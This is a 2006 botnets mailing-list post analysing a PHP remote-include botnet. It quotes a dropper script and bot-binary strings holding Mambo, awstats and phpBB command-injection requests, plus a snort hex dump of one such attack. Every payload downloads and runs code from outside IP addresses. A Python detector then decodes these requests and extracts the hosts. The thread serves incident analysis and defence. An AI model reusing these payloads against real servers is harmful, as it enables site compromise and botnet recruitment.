To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
This seems to be quite popular at the moment.
Around Wed 8th March, I saw a drop using this method, described here -
http://members.lycos.co.uk/jamieriden/mambo-exploit-obfuscated.pdf

Probably not news to most of you, but I was surprised at how many different computers were involved:

  216.63.z.z  - initiator
  66.98.a.a   - server hosting the defacing tool
  216.99.b.b  - machine we get the first stage payload from
  217.160.c.c - machine that we connect back to
  219.96.d.d  - machine we get the second stage payload from

Anyway, this morning we're back to the usual shell script -

  #!/bin/bash
  wget 209.200.224.166/foc
  chmod 744 foc
  ./foc
  wget 209.200.224.166/iron
  chmod 744 iron
  ./iron

where 'iron' has the following strings in the binary:

  GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2083%%2e16%%2e187%%2e6%%2fcacti%%3bchmod%%20%%2bx%%20cacti%%3b%%2e%%2fcacti;echo%%20YYY;echo| HTTP/1.1
  Host: %s
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

  /index.php?option=com_content&do_pdf=1&id=1

  GET %sindex.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%%20/tmp;wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo| HTTP/1.1
  Host: %s
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

  GET %sadmin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%%20/tmp;wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo| HTTP/1.1

and 'foc' looks like the IRC bot.

Note cmd.gif is the same or similar to a tool the Philippine Honeynet project describe as: "'Defacing Tool 2.0 by r3v3ng4ns' is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface websites."

cheers,
Jamie

On 08/03/06, bodik <[EMAIL PROTECTED]> wrote:
> hi,
>
> this list seems to be for white Jedi ;) so I'll add my contribution.
> Even with low experience I believe I found a botnet through a snort report
> about WEB remote include path:
>
> #(8 - 452097) [2006-03-07 08:20:04] [local/2002] [snort/2002] WEB-PHP remote include path
> IPv4: 194.249.251.5 -> XXX.XXX.X.XX
>       hlen=5 TOS=0 dlen=360 ID=23207 flags=0 offset=0 TTL=49 chksum=38897
> TCP:  port=44448 -> dport: 80 flags=***AP*** seq=6723088
>       ack=1590922881 off=5 res=0 win=5840 urp=0 chksum=17886
> Payload: length = 320
>
> 000 : 47 45 54 20 2F 63 76 73 2F 6D 61 6D 62 6F 2F 69  GET /cvs/mambo/i
> 010 : 6E 64 65 78 32 2E 70 68 70 3F 5F 52 45 51 55 45  ndex2.php?_REQUE
> 020 : 53 54 5B 6F 70 74 69 6F 6E 5D 3D 63 6F 6D 5F 63  ST[option]=com_c
> 030 : 6F 6E 74 65 6E 74 26 5F 52 45 51 55 45 53 54 5B  ontent&_REQUEST[
> 040 : 49 74 65 6D 69 64 5D 3D 31 26 47 4C 4F 42 41 4C  Itemid]=1&GLOBAL
> 050 : 53 3D 26 6D 6F 73 43 6F 6E 66 69 67 5F 61 62 73  S=&mosConfig_abs
> 060 : 6F 6C 75 74 65 5F 70 61 74 68 3D 68 74 74 70 3A  olute_path=http:
> 070 : 2F 2F 32 30 34 2E 38 33 2E 35 36 2E 31 34 34 2F  //204.83.56.144/
> 080 : 63 6D 64 2E 67 69 66 3F 26 63 6D 64 3D 63 64 25  cmd.gif?&cmd=cd%
> 090 : 32 30 2F 74 6D 70 3B 77 67 65 74 25 32 30 32 30  20/tmp;wget%2020
> 0a0 : 34 2E 38 33 2E 35 36 2E 31 34 34 2F 67 69 63 75  4.83.56.144/gicu
> 0b0 : 70 6F 3B 63 68 6D 6F 64 25 32 30 37 34 34 25 32  po;chmod%20744%2
> 0c0 : 30 67 69 63 75 70 6F 3B 2E 2F 67 69 63 75 70 6F  0gicupo;./gicupo
> 0d0 : 3B 65 63 68 6F 25 32 30 59 59 59 3B 65 63 68 6F  ;echo%20YYY;echo
> 0e0 : 7C 20 20 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74  |  HTTP/1.1.Host
> 0f0 : 3A 20 31 34 37 2E 32 32 38 2E 34 2E 32 30 0A 55  : XXX.XXX.X.XX.U
> 100 : 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C  ser-Agent: Mozil
> 110 : 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62  la/4.0 (compatib
> 120 : 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69  le; MSIE 6.0; Wi
> 130 : 6E 64 6F 77 73 20 4E 54 20 35 2E 31 3B 29 0A 0A  ndows NT 5.1;)..
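As an added example, not code from Jamie's or bodik's posts and not any tool's own code: a small Python checker that pulls the remote-include and injected-command parameters out of request lines like the ones quoted in this thread, decodes the injected shell command, and recovers the hosts the victim would be made to fetch from. The sample requests are constructed for the example: the Mambo line is rebuilt from the snort hex dump above, the awstats and phpBB lines fill the binary's %s base path with assumed prefixes (/cgi-bin/ and /forum/admin/), and the parameter lists, regexes and the two benign lines are my assumptions, not something the thread states.

```python
import re
from urllib.parse import unquote, urlsplit

# Parameter names taken from the request strings quoted in the thread:
# Mambo/Joomla mosConfig_absolute_path, phpBB phpbb_root_path, the awstats
# configdir and the generic cmd= consumed by cmd.gif / cmd.dat.
REMOTE_INCLUDE_PARAMS = {"mosConfig_absolute_path", "phpbb_root_path"}
COMMAND_PARAMS = {"cmd", "configdir"}

REMOTE_URL = re.compile(r"(?i)^(?:https?|ftp)://")
SHELL_META = re.compile(r"[;|`]|\$\(")
# First argument of a downloader inside the injected command. The scheme is
# optional because these bots wrote 'wget 83.16.187.6/cacti' without one.
DOWNLOADER = re.compile(
    r"\b(?:wget|curl|fetch|lynx)\s+(?:-\S+\s+)*(?:https?://)?([^\s;|&]+)"
)


def host_of(url_or_hostpath):
    """'http://a.b.c.d/cmd.gif?' or 'a.b.c.d/cacti' -> 'a.b.c.d'."""
    stripped = re.sub(r"(?i)^[a-z]+://", "", url_or_hostpath)
    return stripped.split("/", 1)[0]


def analyse_request_line(line):
    """Classify one HTTP request line of the form 'GET /path?query HTTP/1.1'.

    Returns None when nothing matches, otherwise a dict with the script
    path, a list of findings and the sorted list of remote hosts the
    request would make the victim contact (include source plus downloads).
    """
    parts = line.split()
    if len(parts) < 2:
        return None
    target = urlsplit(parts[1])
    findings, hosts = [], set()
    # Split the query by hand: the injected commands carry raw ';' and the
    # stdlib parse_qsl treated ';' as a pair separator in older Pythons.
    for pair in target.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote(raw)  # %2f -> /, %3b -> ;, %2b -> + and so on
        if name in REMOTE_INCLUDE_PARAMS and REMOTE_URL.match(value):
            findings.append(f"remote include via {name}={value}")
            hosts.add(host_of(value))
        if name in COMMAND_PARAMS and SHELL_META.search(value):
            findings.append(f"command injection via {name}: {value}")
            for hostpath in DOWNLOADER.findall(value):
                hosts.add(host_of(hostpath))
    if not findings:
        return None
    return {"path": target.path, "findings": findings, "hosts": sorted(hosts)}


def scan(lines):
    """Run analyse_request_line over many lines and keep only the hits."""
    hits = []
    for index, line in enumerate(lines):
        result = analyse_request_line(line)
        if result is not None:
            hits.append((index, result))
    return hits


# Constructed sample input (see the lead-in): three attack requests from the
# thread and two ordinary requests that must not fire.
SAMPLE_REQUESTS = [
    "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1"
    "&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?"
    "&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;"
    "echo%20YYY;echo| HTTP/1.1",
    "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083"
    "%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;"
    "echo| HTTP/1.1",
    "GET /forum/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?"
    "&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;"
    "echo%20YYY;echo| HTTP/1.1",
    "GET /index.php?option=com_content&do_pdf=1&id=1 HTTP/1.1",
    "GET /cgi-bin/awstats.pl?config=www.example.org&configdir=/etc/awstats HTTP/1.1",
]

if __name__ == "__main__":
    for index, result in scan(SAMPLE_REQUESTS):
        print(f"[{index}] {result['path']} hosts={result['hosts']}")
        for finding in result["findings"]:
            print("    " + finding)
```

Feeding it the request column of a web access log gives the download hosts (the 204.83.56.144 / 83.16.187.6 style addresses in this thread) straight out of the decoded command, which is the part worth blocking or reporting; the remote-include URL and the wget target are usually, but not always, the same box.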
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
